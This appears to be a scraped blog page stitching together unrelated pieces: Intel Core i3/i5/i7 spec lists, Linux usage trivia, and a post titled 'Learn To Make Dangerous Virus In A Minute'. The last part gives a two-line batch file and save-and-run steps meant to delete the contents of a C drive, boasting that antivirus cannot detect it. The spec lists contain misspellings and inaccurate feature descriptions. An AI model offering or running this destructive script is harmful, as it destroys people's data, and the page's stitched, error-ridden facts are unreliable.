Core i3:
* Entry level processor.* 2-4 Cores
* 4 Threads
* Hyper-Threading (efficient use of processor resources)
* 3-4 MB Catche
* 32 nm Silicon (less heat and energy)
Core i5:
* Mid range processor.* 2-4 Cores
* 4 Threads
* Turbo Mode (turn off core if not used)
* Hyper-Threading (efficient use of processor resources)
* 3-8 MB Catche
* 32-45 nm Silicon (less heat and energy)
Core i7:
* High end processor.* 4 Cores
* 8 Threads
* Turbo Mode (turn off core if not used)
* Hyper-Threading (efficient use of processor resources)
* 4-8 MB Catche
* 32-45 nm Silicon (less heat and energy)
Different type of rams
Power of Linux:
1. Google, Facebook, Twitter and
Amazon are all powered by Linux.
2. 850,000 Android devices are
activated every single day, all
running Linux. That means 100
Android devices have come online
since you started reading this
post, all running Linux.
3. 700,000 TVs are sold everyday
most of which are running Linux.
4. 9 out of 10 world's
supercomputers run Linux.
5. 8 out of 10 financial tradesare
powered by Linux
Learn To Make Dangerous Virus In A Minute
In this post i will teach you to make simple yet very powerful or you can say harmful computer virus using a batch file. No software is required to make this virus, Notepad is enough for it. The good thing about this virus is it is not detected by any Anti Virus.
What will this virus do ?
You will create this virus using batch file programming. This virus will delete the C driver completely. The good thing about this virus is that it is not detected by antivirus.
How to Make the Virus ?
1. Open Notepad and copy below code into it.
Code:
@Echo off
Del C:\ *.* |y
2. Save this file as virus.bat (Name can be anything but .bat is must)
3. Now, running this file will delete all content of C Drive.
Warning: Please don't try to run on your own computer or else it will delete all the content of your C Drive. I will not be responsible for any damage done to your computer.
Post a Comment